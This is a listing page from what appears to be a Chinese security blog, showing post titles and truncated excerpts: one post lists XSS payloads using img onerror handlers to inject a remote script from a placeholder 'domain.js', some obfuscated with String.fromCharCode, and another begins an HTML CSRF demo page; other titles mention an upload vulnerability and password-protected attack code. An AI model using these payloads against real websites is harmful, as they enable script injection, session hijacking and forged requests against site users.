障眼法,效果还行。
HTML
密码保护:CSRF-Demo无按钮自动POST提交
密码保护:BC平台接口上传漏洞
密码保护:有价值代码之二(针对无jquery)
密码保护:这是最有价值的代码之一
使用img标签实现xss的常见方法
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script’)).src=”domain.js”></img> <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js'”></img> <img src=1 onerror=jQuery.getScript(“domain.js”)> <img src=”#” onerror=”$.getScript(‘domain.js’)”> <img src=”#” onerror=”var a=String.fromCharCode(47);$.g […]
关于CSRF测试的HTML-demo页面
<!DOCTYPE html> <html> <body> <head> <meta charset=”utf-8″> </head> <form action=”” method=”GET” target=”id_iframe”> 请输入订单:</br> <input type=”text” id=”order_number”></input> </form> <br> <button id=”but”>提交</button> <script> […]